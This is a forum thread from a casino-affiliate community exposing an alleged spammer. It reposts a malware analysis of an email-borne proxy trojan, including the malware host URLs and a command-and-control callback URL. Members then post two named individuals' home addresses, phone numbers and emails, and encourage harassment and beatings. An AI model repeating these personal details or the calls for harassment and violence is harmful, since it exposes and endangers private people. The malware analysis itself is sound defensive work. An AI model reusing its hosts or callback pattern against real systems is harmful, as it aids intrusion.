Get exclusive CAP network offers from top brands

View CAP Offers

Phone a Spammer

[bsa_pro_ad_space id=2]
  • This topic is empty.
Viewing 15 posts - 1 through 15 (of 41 total)
  • Author
    Posts
  • #646647
    Anonymous
    Inactive

    Oh, and I know he reads this forum as the latest garbage had a direct quote from Ellen’s post.

    Not too bright sunshine! :D

    #646649
    Anonymous
    Inactive

    Some more info on this scumbag:

    Type: Trojan (lures you to a website to be infected by a trojan)
    Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
    Exact Link: http://www.hotwincasino.com/page.php
    Email’s Originating Network(s): Sjrb.ca (Canadian Network)
    Danger Level: Medium

    Description

    Yes another spammed out trojan but this time some what different to the most recent ones, mostly in that it does not appear to be a keylogger at alll. We received an email early this morning with the subject of:

    YOU WON A FREE VACATION

    The email also appeared to have no body. It was simply an empty email that scrolled for a fair way. Being suspicous of this we had a peek at the source of the email. We were not to terribly surprised to find that even though the email displayed nothing in the body there was a line, right down the bottom that read:

    object data=”xhttp://www.hotwincasino.com/page.php” width=”14″ height=”14″

    A we’ve mentioned many times before, the OBJECT tag is a method of embedding other content into a HTML page. In this case it fetches and tries to open:

    [url]xhttp://www.hotwincasino.com/page.php[/url]

    We fetched a copy of this page to investigate further. Again we were not surprised to find the page was a HTA (HTML Application) which is basically a very powerful way of allowing web pages interact with Windows systems. At present we don’t have a full idea of how this one works. We know that it calls the file:

    [url]xhttp://www.hotwincasino.com/mstasks.exe[/url]

    In order to do something with it but this time the spammers have been clever and used an ecoding function of VBScript to make the code unreadable to humans. Being non-programmers ourselves we are unsure how to go about decoding this script. If there are any VBScript people out there who would like to give the code a look over (remember it is viral so be careful) there is a copy in the zipe file below.

    We downloaded the mstasks.exe file from the site (not to be confused with the Windows file mstask.exe) and ran strings across it in order to extract any plain text that might give us some clues. This first pass was not very succesful and we only ended up with some information that confirmed that it appeared to hook into various components of Windows networking.

    In order to find out more, we once again set up our VMware (virtual machine) with a victim Windows 2000 operating system. Internal monitoring was set up using the free utilies from Sysinternals who make some very good tools, highly recommended for forensics work on Windows machines. External network monitoring was set up on our Linux gateway.

    Once this was set up we loaded up the page the email used and sat back to watch what happened. Well the good news is that the intial infection phase doesn’t appear to work to well. Our Windows 2000 set up is totally unpatched but Internet Explorer did actually ask us if we wanted to save or execute the code being sucked down. This should tip most people off to something being wrong and cancelling the transaction. However since we don’t have other systems to test, perhaps other versions of Windows do execute the code without asking.

    Either way, once the code is executed a small blank window pops up. Nothing inside it. However in the background there is some serious work happening. From what we can tell the contents of mstasks.exe are downloaded and then executed on the machine. This creates a number of files. We found that in the C: directory there were two new executable files:

    y.exe
    x.exe

    We also found the in the C:WINNTsystem32 directory there was a file called:

    scchost.exe

    Notice again how the spammers have tried to make the file name similar to a real Windows file in the same directory (svchost.exe). We found that this file was now also running as a full time process in the background. After about 30 seconds another executable was created in the same directory this time called:

    scchostc.exe

    This was also started as a full time process (as a child of scchost.exe) and began to listen on a port. Later on we found that this port was choosen at random each time the trojan started up. For example some of the ports we saw being used:

    40627
    12052
    36890

    After this point the trojan appeared to simply sit there and await instructions. After probing the open port for a bit we came to the conclusion that it was a proxy server. At around this time we also noticed some network traffic from the machine. First there was a call from the machine to the site:

    http://www.ip2location.com/map.asp

    Which is a legitimate web site that simply reports back where your request is coming from and if you are behind a proxy server. This is used by the trojan to obtain the machines real IP address for the next phase.

    The next phase is then to send a request that says:

    [url]xhttp://216.52.184.239/command.php?IP=[/url]&Port=

    Once this is done the remote server starts sending back a steady stream of what look like web site fetch requests. However since we’re not super savy with these we are unable to tell completly.

    Basically what we have here is a clever little proxy trojan that the spammers could easily use for a number of things. Making anonymous web requests, sending out spam, attacking other machines on the internet and the fact it reports back to base to keep the spammers up to date is quite handy for them as they don’t have to bother probing to see which machines are infected.

    Having watched the infection in action we then decided to turn our attention back to the executable files. After some more probing we found that several of the files had been packed with UPX and that was why we were getting very little information out of them. We ran the UPX unpacker across the following files:

    mstasks.exe
    scchostc.exe
    y.exe

    The other files we found not be packed with UPX. Once all the files were unpacked we ran strings across them and came out with some interesting results:

    mstasks.exe – The intial infection file. Creates scchost.exe and scchostc.exe. Also adds registery entries to ensure trojan starts at boot time. Also seems to contain the packed components of the other files

    x.exe – Seems to be a left over from the trojan install. Seems to just download mstasks.exe and save it to y.exe

    y.exe – A duplicate of mstasks.exe

    scchost.exe – Trojan start up file. Sets up trojan environment, intialses scchostc.exe and finds out victim machines IP address using the above stated method.

    scchostc.exe – The proxy part of the trojan. Turns out to be a copy of a legitimate proxy software known as 3Proxy. It appears trojan writers have used this before as many anti-virus scanners detect it as Backdoor.Daemonize

    It is important to note this is not a worm or a virus. It is not self propating. That was purposefully sent out by the spammers, as a bulk email in order to get people infected with this trojan.

    Now we knew what the trojan did, we turned back to where the trojan came from. We had a look at the top level for the site and found that it was nothing more than an empty place holder. We also found the files are being hosted on Yahoo! servers. We will contact Yahoo! shortly and inform them of this breach of the AUP and hopefully get the viral files quickly pulled down. We also found that where the trojan is reporting back to appears to be linked with this domain:

    playthehouse.com – (WHOIS) (DNS)

    This link is strengthend, for when we check the apparenet registrants for both domains we find the same person:

    Jeroen Puttemans

    It appears that the he is heavily involved with online casino’s and given what we are seeing today is not above stopping to using trojaned machines to do some dirty work for him.

    Extra Information

    Copy of the email – Due to the fact that Interent Explorer has a habit of trying to execute HTML code even when a file is marked as plain text, we will not be placing a copy of the email here until the sites are confirmed to have been taken down. A copy of the email will be in the zip file

    Strings of mstasks.exe – Before unpacking

    Strings of mstasks.exe – After unpacking

    Strings of x.exe – No unpacking needed

    Strings of y.exe – Before unpacking

    Strings of y.exe – After unpacking

    Strings of scchost.exe – No unpacking needed

    Strings of scchostc.exe – Before unpacking

    Strings of scchostc.exe – After unpacking

    Screen shot of Internet Explorer prompting to execute or download the trojan

    Screen shot of the window that pops up in the user chooses to execute it

    Screen shot showing scchost.exe running in the background

    Screen shot showing the prescence of x.exe and y.exe

    Screen shot showing scchostc.exe being started as a child of scchost.exe

    Screen shot showing scchostc.exe listening on a random port – In this case port 12052

    WARNING

    Some of the files contained in the following zip file are viral in nature. As such we only recommend those who know what they are doing download the file. Code Fish Spam Watch will not take responsibility if this warning is ignored and your machine is infected.

    Copy of trojan site and other details – Contained within a passworded zip file. Password “trojan” but without quotes.

    Log of further activity

    7:15 9/3/04 – Domain still fully active. Going to try and find another way to contact Yahoo!

    And more:
    http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=82

    And he sells credit card info:
    http://www.casinoaffiliateprograms.com/bb/showthread.php?threadid=445

    http://www.startcasino.com/read.php?f=1&i=5333&t=5333

    I expect he will get a few more phone calls and maybe a knock on the door.

    :D

    #646650
    Anonymous
    Inactive

    And it gets worse….what a lowlife scumbag!

    http://www.cleanmailer.com/index.php?catid=13

    WARNING

    If you have been sent to this website by a person calling himself ‘godmailer’, or using the following contact details, you are being ripped off. The product functionality that he describes is inaccurate and not included in our releases.

    Jeroen Puttemans ([email protected])
    +32.23057068
    Platanenlaan 15
    Perk, Brabant 1820
    BE

    Martin Puttemans ([email protected])
    +32.477994283
    Vinkreed 4
    Osmod, BRABANT 1820
    BE

    ICQ: 123226511

    He is offering to sell our product for between $300 and $500 USD. We have determined that he has obtained an early version of our product (REL-0.6) which is severely outdated and functionally incomplete. We have complete logs of his intrustion attempts over the past 2 months and authorities have been contacted.

    We have removed all product information and documentation in the interim.

    If you have already purchased a copy of our software from the above mentioned person please contact us at [email protected], all information will be treated in the strictest of confidence.

    #646651
    Anonymous
    Inactive

    Professor, can you move this and the other related thread to the private forum?

    #646655
    Anonymous
    Inactive

    Hey why go private with this???

    Originally posted by deaning
    Jeroen Puttemans ([email protected])
    +32.23057068
    Platanenlaan 15
    Perk, Brabant 1820
    BE

    Martin Puttemans ([email protected])
    +32.477994283
    Vinkreed 4
    Osmod, BRABANT 1820
    BE

    BTW, thats less than 2hrs drive for me. :D

    #646657
    Anonymous
    Inactive

    True
    I just was looking out for you all actually. The guy obviously reads the threads here and I thought maybe some of you wouldn’t reply to this in the public, since he seems to spam everytime we post something. Although I think he’s wising up a bit now! :D

    #646661
    Anonymous
    Inactive

    What? The private section?

    I vote to post this everywhere! At WOL, B2G, G2B, I would like to start a thread about evil webmasters at The Meisters. Everyone should be talking about this!

    I would like to post it at IAFMA and it should be at startcasino and gambling9111 needs to be informed.

    This industry should self police, and it will if we let it.

    It’s your call – you found the info.

    But let’s let the industry help itself!

    #646666
    vladcizsol
    Member

    I moved here to Private at Ellens request.

    I agree though, everyone should be made aware of this at all available forums…

    #646669
    Anonymous
    Inactive

    Funny shit… I knew who it was going to be… I still get shit from him… and every single one gets forwarded to Spamcop. So as his web hosts keep discovering he is a spammer, he keeps on being forced to find new premises.

    This guy is an asshole. No two ways about it. I hope he shows his face in Amsterdam next month (even though I won’t be there) because someone will recognize him and beat the pulp out of him.

    #646670
    Anonymous
    Inactive

    Recognize him?

    Got a picture?

    #646672
    Anonymous
    Inactive

    Nametag.

    If he’s stupid enough to put real info on his domain registrations, I doubt he’ll be able to fool Marc with a fake name for signing up.

    #646679
    Anonymous
    Inactive

    Dom,

    You sit on him and I’ll piss on his head… (I’ll try not to get you wet).

    #646680
    Anonymous
    Inactive

    Deal, but you better not get me wet!

    Otherwise I might accidentally hit you when I whip him afterwards.

    ale.gif

    #646686
    Anonymous
    Inactive

    I agree with you all, I honestly thought he may do to one of you what he did to Dean and I if anyone posted in one of these threads. I posted about the spam, then in hours got slammed w/ 22k bounces with EllenIng as the sender. Then Dean posted and he got slammed with 1k as deaning as the sender. So obviously he was reading the threads.
    I just got some more spam from him and this site is the link
    xxxxhttp://www.casinowebmarketing.com/
    We’ll get to the bottom of this :angry:

    #646688
    Anonymous
    Inactive

    He can’t take on the entire industry. He needs to be exposed so he won’t do it to more people. Managers need to know to drop him, players need to know to shun his sites.

    He needs to be stopped. And you don’t have to go it alone.

Viewing 15 posts - 1 through 15 (of 41 total)